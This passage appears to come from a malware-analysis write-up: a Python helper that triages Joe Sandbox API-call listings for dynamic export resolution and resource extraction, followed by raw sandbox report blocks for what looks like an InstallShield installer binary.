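                             m.group("ref").upper(), m.group("sub")))
    return calls


def parse_string_id(line: str) -> List[str]:
    """Split a 'String ID:' line on '$' (assumed separator). A referenced string that itself
    contains '$' (such as the '$jG' seen in this report) is ambiguous; empty pieces are dropped."""
    _, _, rest = line.strip().lstrip("•").strip().partition("String ID:")
    rest = rest.strip()
    return [s for s in rest.split("$") if s] if rest else []


def _is_concrete(arg: str) -> bool:
    """True when the disassembler resolved the argument to a literal, not '?' or a raw dword."""
    return arg not in ("", "?") and not _HEX8.match(arg)


def find_dynamic_resolution(calls: List[ApiCall]) -> List[Tuple[Optional[str], str, str]]:
    """Pair each GetProcAddress(_, "Export") with the most recent module lookup by address.
    Returns (dll_or_None, export_name, call_site) tuples."""
    found, dll = [], None
    for c in sorted(calls, key=lambda c: int(c.ref, 16)):
        if c.name in _MODULE_LOOKUPS:
            dll = c.args[0] if c.args and _is_concrete(c.args[0]) else None
        elif c.name == "GetProcAddress" and len(c.args) > 1 and _is_concrete(c.args[1]):
            found.append((dll, c.args[1], c.ref))
    return found


def find_resource_extraction(calls: List[ApiCall]) -> List[str]:
    """Return the call sites of FindResource -> LoadResource -> LockResource when all three
    appear in that address order (A/W suffix ignored); otherwise an empty list."""
    refs, want = [], 0
    for c in sorted(calls, key=lambda c: int(c.ref, 16)):
        if want < len(_RESOURCE_CHAIN) and c.name.rstrip("AW") == _RESOURCE_CHAIN[want]:
            refs.append(c.ref)
            want += 1
    return refs if want == len(_RESOURCE_CHAIN) else []


def triage(block_text: str) -> dict:
    """Run both heuristics over one function block."""
    calls = parse_api_lines(block_text)
    return {"calls": len(calls),
            "dynamic_resolution": find_dynamic_resolution(calls),
            "resource_extraction": find_resource_extraction(calls)}


# Sample input: the 'APIs' bullets of the two function blocks above, copied from the report.
REG_BLOCK = """
• GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00401434
• GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 0040144B
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000), ref: 00401484
• RegCloseKey.ADVAPI32(00000000), ref: 00401497
"""
RESOURCE_BLOCK = """
• FindResourceW.KERNEL32(?,?,00000001,?,?,00000001,?,0041786D,?,?,00000005,00000080,00416E27,00000402,?,00416E3A), ref: 004150F7
• LoadResource.KERNEL32(?,00000000,?,?,00000001,?,0041786D,?,?,00000005,00000080,00416E27,00000402,?,00416E3A,?), ref: 00415107
• SizeofResource.KERNEL32(?,00000000,?,?,00000001,?,0041786D,?,?,00000005,00000080,00416E27,00000402,?,00416E3A,?), ref: 0041511D
• _memset.LIBCMT ref: 0041513E
• LockResource.KERNEL32(00000000,?,utils.cpp,?,00000001,000008A4,0043FC6E,?,00000000), ref: 0041514A
• _memmove.LIBCMT ref: 00415153
• __CxxThrowException@8.LIBCMT ref: 00415166
"""

if __name__ == "__main__":
    for label, block in (("registry block", REG_BLOCK), ("resource block", RESOURCE_BLOCK)):
        print(label, triage(block))
```

Run stand-alone it prints the findings for both blocks; the registry block yields one dynamically resolved export (Advapi32.dll, RegOpenKeyTransactedW) and no resource chain, the resource block the reverse. The address sort matters: Joe Sandbox lists calls in address order already, but a nested "Part of subcall" line carries the callee's address and would otherwise be interleaved wrongly.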

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: __wcsnicmp
• String ID: /removeonly$reboot$removeasmajorupgrade$runas$runfromtemp
• API String ID: 1038674560-2163775701
• Opcode ID: 21cb6c82f6b099d0fff45b3db1863684f022ac0d031aab3329a0a9a6c0b7ef04
• Instruction ID: 4b1f0e7bad81f6d28d9fdb14035485bb697c1f8fbec907bf99468651087c75b0
• Opcode Fuzzy Hash: 21cb6c82f6b099d0fff45b3db1863684f022ac0d031aab3329a0a9a6c0b7ef04
• Instruction Fuzzy Hash: EC01813138C70238B6156B255DA2FFB1249CE0179D7B4406FB919B05C2EB4CDEC294AE
Uniqueness

Uniqueness Score: -1.00%

APIs
• FormatMessageW.KERNEL32(00001300,00000000,?,00000000,?,00000000,00000000,00000000,00000000), ref: 00440E2C
• _memset.LIBCMT ref: 00440E4C
• wsprintfW.USER32 ref: 00440E64
  • Part of subcall function 0043F50C: __EH_prolog3_GS.LIBCMT ref: 0043F516
• LocalFree.KERNEL32(?), ref: 00440E7F
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: FormatFreeH_prolog3_LocalMessage_memsetwsprintf
• String ID: $jG$%s %s
• API String ID: 1431993970-213347874
• Opcode ID: bb65509c4c414d9e026785f56b3a0584d4a6cdb32b72b43ea566541a56a18306
• Instruction ID: d72b2d0749c07a7a1fad2937cb8441a8d4a452bdfe9ed9daaf3d6a7851d5b3c4
• Opcode Fuzzy Hash: bb65509c4c414d9e026785f56b3a0584d4a6cdb32b72b43ea566541a56a18306
• Instruction Fuzzy Hash: 3A015275900118BADB60AFA5CC09EDF7BFCFF49704F0040AAB549E2151DE349A89CFA8
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 004155B6
• GetLastError.KERNEL32(00000004,0041576F), ref: 004155D3
• SysFreeString.OLEAUT32(?), ref: 004155E0
• SetLastError.KERNEL32(?), ref: 004155FA
• GetLastError.KERNEL32 ref: 0041560D
• SysFreeString.OLEAUT32(?), ref: 00415632
• SetLastError.KERNEL32(?), ref: 00415646
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FreeString$H_prolog3
• String ID:
• API String ID: 746121330-0
• Opcode ID: 9a13373675f47005e7df3f2470c7c590d7b6347179ca03a7867f3c5839bd0c71
• Instruction ID: 51b7835df31c1f5d96a14ce7357e699eb6ada25b27359b4e68efd17be01d3a15
• Opcode Fuzzy Hash: 9a13373675f47005e7df3f2470c7c590d7b6347179ca03a7867f3c5839bd0c71
• Instruction Fuzzy Hash: 1B110430900640CFDB11DF68C988A58BBF1FF04314F59C49DE999AB266C7B5E904DB18
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00415655
• GetLastError.KERNEL32(00000004,0041578E), ref: 00415672
• SysFreeString.OLEAUT32(?), ref: 0041567F
• SetLastError.KERNEL32(?), ref: 00415699
• GetLastError.KERNEL32 ref: 004156AC
• SysFreeString.OLEAUT32(?), ref: 004156D1
• SetLastError.KERNEL32(?), ref: 004156E5
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString$H_prolog3
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 746121330-0
                                                                                                                                                                          • Opcode ID: 1f3f4583d16c4629b735d462e41cdc53c9b2c721044bd4caa17fcf5f8ade77a3
                                                                                                                                                                          • Instruction ID: db8608bf25cbde5bbcfc2047566ee4b781b9a3fb600c4e2a4237ad6da8b17e9f
                                                                                                                                                                          • Opcode Fuzzy Hash: 1f3f4583d16c4629b735d462e41cdc53c9b2c721044bd4caa17fcf5f8ade77a3
                                                                                                                                                                          • Instruction Fuzzy Hash: 6B11D434900640CFDB11DF68C988A58BBF1FF04314F59C59DE999AB266C7B5E904DB18
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00415CD7
• GetLastError.KERNEL32(00000004,00416220,?,00000000,00000004,004166C1,?,00000001), ref: 00415CFB
• SetLastError.KERNEL32(?), ref: 00415D2C
• SetLastError.KERNEL32(00000000), ref: 00415D50
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3
• String ID: HsG$hsG
• API String ID: 3502553090-148063137
• Opcode ID: ec0d61531b32181e74508d6c40cb29c044a4de5f789a18cd9ac17a0aaa5bd4a1
• Instruction ID: 9e7455ceeed0943b77a4ed3ed8ffec7b2254be637fce5cfc9610fe2e9be2ac8e
• Opcode Fuzzy Hash: ec0d61531b32181e74508d6c40cb29c044a4de5f789a18cd9ac17a0aaa5bd4a1
• Instruction Fuzzy Hash: 81111574904240CFCB04EF59C989789BBB1BF04319F45C0AAED099F2A7C7B8DA44CB54
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(KERNEL32), ref: 0040B512
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040B520
• GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040B537
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: AddressProc$HandleModule
• String ID: KERNEL32$SetDllDirectoryW$SetSearchPathMode
• API String ID: 667068680-4129897381
• Opcode ID: dbca5a1e264295a750feb4126b20dab2ad72129a36170f7438690a5b26ff53ad
• Instruction ID: c2897d3eb4502c17e6208073a17fde5e2fbbc6a626daba68eb5e81178ce9b57e
• Opcode Fuzzy Hash: dbca5a1e264295a750feb4126b20dab2ad72129a36170f7438690a5b26ff53ad
• Instruction Fuzzy Hash: 13E0EC71342B253FA6202BB46C49AAE254DDA45B663624476B40CE1281DBA98E4446AD
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004330D0: __EH_prolog3.LIBCMT ref: 004330D7
  • Part of subcall function 004330D0: lstrcmpiW.KERNEL32(?,00000000,0043133A,?,?,?,CC858012,?,?,?,?,?,0046C010,000000FF), ref: 0043314E
• CharNextW.USER32(?), ref: 004313FB
• CharNextW.USER32(00000000), ref: 00431418
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: CharNext$H_prolog3lstrcmpi
• String ID:
• API String ID: 1581910369-0
• Opcode ID: 5b0779d5db4df0feaae4564c6fc6ee4d78a0f04948b150473b0cab08deff2d9f
• Instruction ID: 9787e126a82dfed7ee43eb5a99be9458abed55ca0fe481fe3ed0c1529d7b467f
• Opcode Fuzzy Hash: 5b0779d5db4df0feaae4564c6fc6ee4d78a0f04948b150473b0cab08deff2d9f
• Instruction Fuzzy Hash: D8A1B171D00228DBDB24DF64CD4A9EDB7B9EB28314F1550EBE609A32A0D7384E95CF58
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043D696
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0043D610: __EH_prolog3.LIBCMT ref: 0043D617
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0043D743
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0043D751
                                                                                                                                                                          • _memset.LIBCMT ref: 0043D76D
                                                                                                                                                                            • Part of subcall function 0043E772: SetFilePointer.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,0043DDC5,00000000,?,00000000,00000000), ref: 0043E792
                                                                                                                                                                            • Part of subcall function 0043E772: GetLastError.KERNEL32(?,?,?,?,0043DDC5,00000000,?,00000000,00000000), ref: 0043E79A
                                                                                                                                                                          • ReadFile.KERNEL32(0000002E,?,0000002E,?,00000000,?,?,00000000,00000000,00000044,0043EBF5,?), ref: 0043D79F
                                                                                                                                                                            • Part of subcall function 0043DA40: __EH_prolog3_GS.LIBCMT ref: 0043DA47
                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000002E,?,00000000,?,?,00000000,00000000,?), ref: 0043D816
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLast$H_prolog3_Read$CreateH_prolog3Pointer_memset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1186803598-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memset$BrowseFolderFromH_prolog3_ListMallocPath
• String ID:
• API String ID: 1804835819-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(CC858012,?,00000000,74B04C30), ref: 0040349F
• GetLastError.KERNEL32(?,00000000,000000FF), ref: 00403539
• SysFreeString.OLEAUT32(?), ref: 00403553
• SysFreeString.OLEAUT32(?), ref: 00403560
• SetLastError.KERNEL32(?), ref: 00403584
• SetLastError.KERNEL32(?,?,00000000,74B04C30), ref: 0040358A
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$FreeString
• String ID:
• API String ID: 2425351278-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,CC858012,?,?,00000000,?,0043D0DA,?), ref: 0045FBAE
• CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,?,?,00000000,?,0043D0DA,?), ref: 0045FBC6
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,?,00000000,?,0043D0DA,?), ref: 0045FBDE
• GetFileSize.KERNEL32(00000000,00000000,0043D0DA,?,?,00000000,?,0043D0DA,?), ref: 0045FBF4
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,0043D0DA,?), ref: 0045FC2C
• CloseHandle.KERNEL32(?,?,?,00000000,?,0043D0DA,?), ref: 0045FC38
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$CloseCreateHandle$MappingSizeView
• String ID:
• API String ID: 2246244431-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,00420374,?,0000000C,0000000C,?,?,00000000,?,?,?), ref: 0043F7E1
• lstrcpyW.KERNEL32 ref: 0043F800
• lstrcatW.KERNEL32(00000000,00477E70), ref: 0043F80C
• lstrlenW.KERNEL32(00000000,?,?,00420374,?,0000000C,0000000C,?,?,00000000,?,?,?,CacheFolder,?,00000001), ref: 0043F815
• CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00420374,?,0000000C,0000000C,?,?,00000000,?,?,?,CacheFolder,?), ref: 0043F82F
• GetLastError.KERNEL32(?,?,00420374,?,0000000C,0000000C,?,?,00000000,?,?,?,CacheFolder,?,00000001,00483E18), ref: 0043F839
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: lstrlen$CreateDirectoryErrorLastlstrcatlstrcpy
• String ID:
• API String ID: 4043630017-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: lstrcpy$_wcsrchr$CharNext
• String ID:
• API String ID: 3722002711-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• _memset.LIBCMT ref: 00440BBE
• CharNextW.USER32(?,?,?,004A4DA0), ref: 00440BC7
• lstrcpyW.KERNEL32 ref: 00440BDB
• CharNextW.USER32(00000000,?,?,004A4DA0), ref: 00440BF0
• CharPrevW.USER32(00000000,00000000,?,?,004A4DA0), ref: 00440C09
• lstrcpyW.KERNEL32 ref: 00440C24
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: Char$Nextlstrcpy$Prev_memset
• String ID:
• API String ID: 3355883774-0
• Opcode ID: 2fa2676458f834c079688b3e5b12c2850d0cb4d43c284c4dff1d097302f8f75f
• Instruction ID: 64289ccc0ebac8a2fad1895704337603e4d2db59093f3911c2237bfb149bebdf
• Opcode Fuzzy Hash: 2fa2676458f834c079688b3e5b12c2850d0cb4d43c284c4dff1d097302f8f75f
• Instruction Fuzzy Hash: 11119871940218AADB51EBA0DD4999B73BCFF44304F0144A7E249D7150DA746E88CBA8
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Item$EnableWindow$Focus
• String ID:
• API String ID: 864471436-0
• Opcode ID: a2497a695f5f20b0819f08c56531db3b6b7cf9df74ad01596c4617ef5ac4de44
• Instruction ID: 9d619b0bf6a7a9bf048a6c4f41078e9e0e093828bbb8fc522f64ba9d1e5f9aef
• Opcode Fuzzy Hash: a2497a695f5f20b0819f08c56531db3b6b7cf9df74ad01596c4617ef5ac4de44
• Instruction Fuzzy Hash: F2F0B771100659EBCF216F51EC09F5B3F6AEB84302F514836F504911B187B6A9A4DF69
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0045BCD8
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
  • Part of subcall function 0045B867: __EH_prolog3_GS.LIBCMT ref: 0045B86E
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3_$H_prolog3
• String ID: HsG$HsG$HsG$]
• API String ID: 532146472-3623979117
• Opcode ID: 6e3118012fd750dc6c53b4988793253a640f5caf85adf5ba554f46af1e9dfe4f
• Instruction ID: 621b2d32b559991168a5cdd18755e8c18f361374da92d371e6b76218741a7f82
• Opcode Fuzzy Hash: 6e3118012fd750dc6c53b4988793253a640f5caf85adf5ba554f46af1e9dfe4f
• Instruction Fuzzy Hash: EEA18171800118EFCB15DBA5CC91BDEB7B8BF15304F5441AEE909A3282EB746B88CF65
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00428ED4
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 00435F95: __EH_prolog3_GS.LIBCMT ref: 00435F9F
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 0042B977: __EH_prolog3_catch.LIBCMT ref: 0042B97E
  • Part of subcall function 0042B977: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0042B992
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$FreeH_prolog3_String$Concurrency::details::_Concurrent_queue_base_v4::_H_prolog3_catchInternal_throw_exception
• String ID: 1033$J#Version$SOFTWARE\Microsoft\Visual JSharp Setup\Redist$Startup
• API String ID: 1602809483-1919874662
• Opcode ID: d53d6130d6d264d9cb8cd05675826637091d6fadf1489e0200aff15993115bf5
• Instruction ID: 14f342ceb626aa84de4d9507cab1b6860b727b1aa20d7a0873be447e8848ae8d
• Opcode Fuzzy Hash: d53d6130d6d264d9cb8cd05675826637091d6fadf1489e0200aff15993115bf5
• Instruction Fuzzy Hash: B8616C71900168DACB20DB95CC81BEDB7B8AF50304F5084EBE10AB7191DB795F89CF69
Uniqueness

Uniqueness Score: -1.00%

APIs
• _memmove.LIBCMT ref: 0045510E
• _memmove.LIBCMT ref: 00455147
• _memmove.LIBCMT ref: 0045517F
• _memmove.LIBCMT ref: 004551A8
  • Part of subcall function 00441423: std::exception::exception.LIBCMT ref: 00441436
  • Part of subcall function 00441423: __CxxThrowException@8.LIBCMT ref: 0044144B
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                                                          • String ID: deque<T> too long
                                                                                                                                                                          • API String ID: 1300846289-309773918
                                                                                                                                                                          • Opcode ID: 2c7332f8466c2cb557cfd69f5a75fac8b0ec67a396cdbf2bf06dd5614dde0a71
                                                                                                                                                                          • Instruction ID: ecb53842e9072314e3327d466ce02600a3ed2c257f157b4adbcde03a9951e8bb
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c7332f8466c2cb557cfd69f5a75fac8b0ec67a396cdbf2bf06dd5614dde0a71
                                                                                                                                                                          • Instruction Fuzzy Hash: C241F8B2D00625ABD710DF99CD42AAFB768EB40364F14832AF924E7241D774AE54C7D4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(CC858012,?,74B04C30,74B04D40), ref: 00404373
• SysFreeString.OLEAUT32(?), ref: 0040438F
• SysFreeString.OLEAUT32(?), ref: 0040439A
• SetLastError.KERNEL32(?), ref: 004043BA
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
